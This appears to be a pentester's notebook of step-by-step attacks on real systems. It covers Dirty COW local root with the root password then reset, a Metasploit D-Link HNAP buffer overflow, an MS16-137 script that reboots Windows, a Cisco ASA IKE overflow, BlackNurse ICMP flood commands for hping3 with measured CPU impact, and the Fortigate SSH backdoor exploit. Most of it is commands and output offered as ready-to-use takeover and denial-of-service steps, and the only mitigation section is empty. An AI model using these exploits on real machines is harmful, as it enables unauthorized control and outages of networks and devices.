Takeover target linux using dcow

# mv 40847 40847.cpp
# g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil

-copy dcow into your target linux
-login as normal user then later we will change root password
login as: user1
user1@10.0.10.31’s password:
$ bash
user1@ubuntu:~$ chmod 755 dcow
user1@ubuntu:~$ ./dcow -s
Running …
Password overridden to: dirtyCowFun
Received su prompt (Password: )
echo 0 > /proc/sys/vm/dirty_writeback_centisecs
cp /tmp/.ssh_bak /etc/passwd
rm /tmp/.ssh_bak

root@ubuntu:~# passwd root
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully

DLink router attack

OPTION1:
Image.png
L: admin
P: TestingR2

OPTION2:
Image.png

OPTION3
This from LAN
# msfconsole
msf > use exploit/linux/http/dlink_hnap_login_bof
msf exploit(dlink_hnap_login_bof) > show options
Module options (exploit/linux/http/dlink_hnap_login_bof):
   Name      Current Setting  Required  Description
   —-      —————  ——–  ———–
   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][…]
   RHOST                      yes       The target address
   RPORT     80               yes       The target port
   SHELL     /bin/sh          yes       Don’t change this
   SHELLARG  sh               yes       Don’t change this
   SLEEP     0.5              yes       Seconds to sleep between requests (ARM only)
   SRVHOST   0.0.0.0          yes       IP address for the HTTP server (ARM only)
   SRVPORT   3333             yes       Port for the HTTP server (ARM only)
   SSL       false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                    no        The URI to use for this exploit (default is random)
   VHOST                      no        HTTP server virtual host
Exploit target:
   Id  Name
   —  —-
   0   Dlink DIR-818 / 822 / 823 / 850 [MIPS]
msf exploit(dlink_hnap_login_bof) > set rhost TARGETIP
msf exploit(dlink_hnap_login_bof) > run

LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)

SOURCE:
This attack successfully restarted Windows XP-10 and 2008R2-2012R2
# wget
# unzip 40744
# python Lsass-remote.py targetip
Target windows will be restarted

SOLUTION:

Cisco ASA Software 8.x / 9.x – IKEv1 and IKEv2 Buffer Overflow

SOURCE:
RESULT:
-crashed ASA and force it to reboot

AFFECTED DEVICE:
Buffer overflow in the IKEv1 and IKEv2 implementations in
-Cisco ASA Software before 8.4(7.30), 8.7 before 8.7(1.18), 9.0 before 9.0(4.38), 9.1 before 9.1(7), 9.2 before 9.2(4.5), 9.3 before 9.3(3.7), 9.4 before 9.4(2.4), and 9.5 before 9.5(2.2) on ASA 5500 devices, ASA 5500-X devices
-ASA Services Module for Cisco Catalyst 6500 and Cisco 7600 devices, ASA 1000V devices
-Adaptive Security Virtual Appliance (aka ASAv), Firepower 9300 ASA Security Module, and ISA 3000

VERIFICATION:
-find open port using kali linux
# nmap -v -A 10.0.10.221
opened ports are 22 and 443

-download python script from https://www.exploit-db.com/exploits/39823/
# python 39823.py 10.0.10.221 10.0.10.103:443
10.0.10.103 is my pc ip
443 is port that we want to attack, we can use port 22 instead

Firewall/Router Attack – BlackNurse

SOURCE: blacknurse.dk

This BlackNurse attack will causing high CPU on target device

REQUIREMENT:

-Kali linux

Attack (flood better)
# hping3 -1 -C 3 -K 3 -i u20

# hping3 -1 -C 3 -K 3 –flood

RESULTS:
-Mikrotik v6.37.1 CPU utilization before attack 4%, after attack 44%
-Fortigate 5.2 CPU utilization before attack idle 99%, after attack idle 70%

This attack only from 1 source. Could be more damage if I am using more attack sources

LIST OF REPORTED AFFECTED PRODUCTS :
-Cisco ASA 5505, 5506, 5515, 5525 , 5540 (default settings)
-Cisco 6500 routers with SUP2T and Netflow v9 on the inbound interface – 100% CPU load
-Cisco ASA 5550 (Legacy) and 5515-X (latest generation)
-Cisco Router 897 – Can be mitigated – The current code from https://www.cymru.com/Documents/secure-ios-template.html will make evil worse.
-Fortinet v5.4.1 – One CPU consumed
-Fortigate units 60c and 100D (even with drop ICMP on) – RESPONSE FROM FORTINET
-Some unverified Palo Alto – SEE ANSWER FROM PALO ALTO
-Palo Alto 5050 Firewalls with firmware 7.1.4-h2
-SonicWall – Misconfiguration can be changed and mitigated (Enable Anti-DDOS)
-Zyxel NWA3560-N (Wireless attack from LAN Side)

-Zyxel Zywall USG50

NOT AFFECTED:
-AVM Fritz!Box 7360 (common ADSl router in Germany)
-Check Point Security Gateways – Checkpoint response!
-Cisco ISR4321 Router IOS XE – Version 15.5(3)S2, RELEASE SOFTWARE (fc2)
-GigaVUE HC-Serie (Gigamon)
-Iptables
-Juniper SRX
-Mikrotik CCR1036-12G-4S firmware: 3.27 (250 Mbit/sek) and no problem && RouterOS 5.4 on Mikrotik RB750
-OpenBSD 6.0 and current
-pfSense
-Ubiquiti Networks – EdgeRouter Lite CPU 60-70% load but still going
-Windows Firewalls

Fortigate OS 4.x < 5.0.7 – SSH Backdoor

SOURCE: https://www.exploit-db.com/exploits/39224/

This remote exploit which allows remote attackers to obtain administrative access via an SSH session

Affected device:
-FortiAnalyzer before 5.0.12 and 5.2.x before 5.2.5
-FortiSwitch 3.3.x before 3.3.3; FortiCache 3.0.x before 3.0.8
-FortiOS 4.1.x before 4.1.11, 4.2.x before 4.2.16, 4.3.x before 4.3.17 and 5.0.x before 5.0.8

# mv 39224.py fgt_ssh_backdoor.py
# chmod 744 fgt_ssh_backdoor.py
# ./fgt_ssh_backdoor.py targetip